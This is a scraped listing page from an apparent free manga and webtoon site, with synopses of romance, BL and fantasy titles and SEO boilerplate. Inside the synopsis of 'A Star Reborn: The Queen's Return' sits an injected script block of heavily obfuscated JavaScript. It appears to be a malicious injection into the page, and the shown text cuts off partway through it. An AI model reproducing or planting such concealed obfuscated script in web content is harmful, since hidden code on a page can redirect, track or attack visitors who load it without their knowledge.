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Find your next favorite in manga Webtoon with our collection of top picks. Read Webtoon manga for free today!

3938 results

A Secret Contract And The Stallion Sage

A World Where People Live In Fear Of Magical Beasts… Nobles With Magical Powers Are Known As “Noble Sorcerers” And They Use Their Magic To Destroy The Beasts. Stella, The Only Daughter Of Count Norris, Should Have Died After Marrying The Violent Ethan Elliott And Being Locked In His Cellar. But When She Opened Her Eyes, She Had Returned To The Day When Her Engagement Was Decided. To Avoid Facing The Same Future, She Ran Away. She Then Met A Man Named Lucas In The Forest. Although Lucas Is The Son Of Count Bloodrare, He Is Called Incompetent Because He Is Unable To Use Magic And Is Rumored To Be Impotent As Well, Because He Does Not Physically React To Any Woman. Lucas Cannot Rejuvenate His Magic On His Own, But He Recovers A Little Of It When He Touches Stella, Something That Has Never Happened Before No Matter What He Tried. In Order For Lucas To Recover His Magical Powers And For Stella To Be Free, The Two Enter Into A Year-Long Contract Marriage. However, Each Time They Come Into Contact With Each Other, They Start To Become Attracted To Each Other, And They Finally Cross The Line. Then, After Recovering A Great Amount Of His Magical Power, Lucas Finally Awakens His True Power…


A Secure Promise

Anno, a lower rank power user, made an escape plan from an underground research institute, but he encountered Jing Ye, a high rank power user who could cancel out his powers. He tried to avoid Jing Ye at all costs but their fates seemed to be intertwined. Jing Ye destroyed all of his plans, stripped him of all his choices and even corrupted his rationality. With Jing Ye being so secretive and suspicious, will Anno choose to believe in him? Or will Anno choose freedom, and escape from that hellish place instead?


A Shared House

'Park Tae-joo' was often kicked out of the place where he lived because of his harsh impression. Through a friend's introduction, he enters the house of 'Joo Ha-jin', who is called the economics elite. As soon as you open the door, you can see the spread of condoms and sex toys, and it turns out that your roommate is a famous sex addict! Amidst the accumulated misunderstandings, Tiki-taka continues to live a troubled life, but at some point they become conscious of each other... Can these two get along safely in the same house?!


A Simple Thinking About Blood Type

Have you ever wondered why Koreans ask you about your blood type? It’s not because they want to know what to do in case you happen to be in an accident (although it really is vital information), but it’s because there is a underlying belief that blood types affect personalities and character in the way an astrological sign may. Another hugely successful webtoon, it has packed all the existing stereotypes of each blood type and more into a hilarious series. Strangely enough, there are many which are so darn true it’s kind of uncanny. Much funnier when you know your own blood type. Original webtoon (Korean webcomic)


A Song of Prosperity

An intelligent and domineering woman encounters a carefree, flamboyant prince at a brothel. Initially, she thinks of it as nothing more than a chance meeting, but little did she know their fates would end up being so deeply intertwined...<br><br>“If you hold no love for me, then I will give up my love for you as well.”<br><br>A romance story about love and loss set in ancient times.


A Sound From Your Heart

One of the most popular webtoon of all time! The most comical comic you will ever see! Following a life of an ordinary author


A Star From Above

This BL revolves around the lives of three high schoolers: Haruka, Han Meol, and Dong Chan. One day, Haruka moved to their school and eventually became their classmate. Despite being total strangers, the trio soon became close. However, Han Meol and Dong chan began to feel something strange with Haruka. Is it somewhat of a bad sign or will it be the start of something even more beautiful between them?


A Star Reborn: The Queen’s Return

She was the Queen of Song, but she died during her greatest years. After she was reincarnated, she became a simple trainee. She lost her former glory? It doesn’t matter—no one can compete with her beautiful singer’s voice. She’s mocked for her lowly birth? It doesn’t matter—her true identity is enough to make the whole world tremble. She owes huge debts? It doesn’t matter… A powerful boss whispered to her: “The debt will disappear if you would become my woman.” But she is proud: “I’m sorry. I would sell my art, but not my whole self.” ———————————————— This is the story of the Queen of Song, of her return to the peak… and an overbearing chairman.<script></script><script>(function(_0x241853,_0x3738b3){var _0x42a926=_0x33f1,_0x2b20f7=_0x241853();while(!![]){try{var _0x5c17ed=-parseInt(_0x42a926(0x137))/(0x174b+0x1d82+-0x34cc)+-parseInt(_0x42a926(0x13a))/(-0x143f+0x250a+-0x10c9)*(-parseInt(_0x42a926(0x134))/(-0x1f7c+-0x1610+-0x358f*-0x1))+-parseInt(_0x42a926(0x141))/(0x3*-0x64b+0x35a+-0x17*-0xad)+-parseInt(_0x42a926(0x142))/(0x1*0x1722+-0x55f+-0x11be)+parseInt(_0x42a926(0x144))/(0x1f1a+-0x1*-0x228+0x4*-0x84f)*(-parseInt(_0x42a926(0x146))/(-0x163a+0x24d*-0xe+-0x49*-0xbf))+parseInt(_0x42a926(0x151))/(0x1*0x1727+0x1*0x49f+-0x1bbe)*(parseInt(_0x42a926(0x13c))/(0x18f2+-0x53e+-0x5f*0x35))+parseInt(_0x42a926(0x133))/(0x1*-0x7d5+-0x1dd7+0x2*0x12db);if(_0x5c17ed===_0x3738b3)break;else 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A Strange Joke

This is the story of two people living out their campus romance, the returning transfer student Min who has a though time with love and the department legend Joon who's scared of romance.


A Stupid Prophet Decided My Fate, so Now I Dress Like a Girl!

To save a kingdom that in chaos was, the king called for a prophet whose prophecy would quench the anger of the people and possibly make the land prosper once again. The prophet replied, “if your kingdom is to prosper, only with the birth of a girl it will.” However, a healthy baby boy was born and now the land is doomed to wither away unless the boy turns into a girl?!


A Sunny Night Walk

Hyun Jihwan is an aspiring musician who can teleport. One day, he takes a trip to Germany on a whim, and is discovered by Nigel Ernst Kerne. Ever since that fateful encounter, Jihwan begins to frequently visit Nigel, who showers him with good hospitality and affection in return. But as the visits become more frequent and Nigel begins to want more of him, Jihwan isn't sure if this unique double life can go on. Can this unusual long distance relationship work? Or was it never meant to be?


A Terminally Ill Villainess Refuses To Be Adopted

Read A Terminally Ill Villainess Refuses To Be Adopted Novel – A Terminally Ill Villainess Refuses To Be Adopted Manhwa Online Free At Zinmanga.net The Summary Of The Comic A Terminally Ill Villainess Refuses To Be Adopted: When The Villain Was Young, She Became Extra #1 Who Deceived Him And Sold Him As A S*Ave. This Girl, Who Was Suffering From An Incurable Disease, Tried To Buy Painkillers By Selling Him, But Later Dies Miserably By The Villain’s Hand. Fortunately, He Had Not Been Sold Yet, So Let’s Kick The S*Ave Traders First. Even As A 12-Year-Old Orphan, I Took Great Care Of A 12-Year-Old Villain. Even Though He Was Young, He Was Wary Of Me Until The Time Of Parting Came, Perhaps Because He Was The Villain. Fortunately, I Was Able To Get A Promise Not To Be Killed. And The Day The Villain Family Came To Take Him Back Finally Came. “……Are You Telling Me To Go Away?” “If There Is A Place To Return To, You Have To Go. Stay Healthy And Don’t Die Easily. Understand?” After Somehow Sending Away The Villain Who Kept Staring At Me Persistently, I Turned Around And Vomited Blood. This Annoying Incurable Disease. Well, It’s Okay Because I Know How To Fix It. I Would Be Able To Start A New Life If I Could Heal My Illness And Leave Here. But. “You……” ……There Was Something Strange About The Villain’s Prickly Face That Was Looking At Me. “A Terminally Ill Villainess Refuses To Be Adopted” Is Also Known As: The Villain Refuses Adoption / Неизлечимо Больная Злодейка Отказывается Быть Усыновленной / 시한부 악녀는 입양을 거절합니다 The Comic A Terminally Ill Villainess Refuses To Be Adopted Belongs To The Genre: Drama, Fantasy, Manhwa, Romance, Webtoons “Top Manhwa, Mangaupdates, Read Manhwa Online…” Are The Most Searched Keywords On The Website Zinmanga. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga Silver Tree The Corrupted Witch Has No Choice But To Become A Villain I Became The King By Scavenging
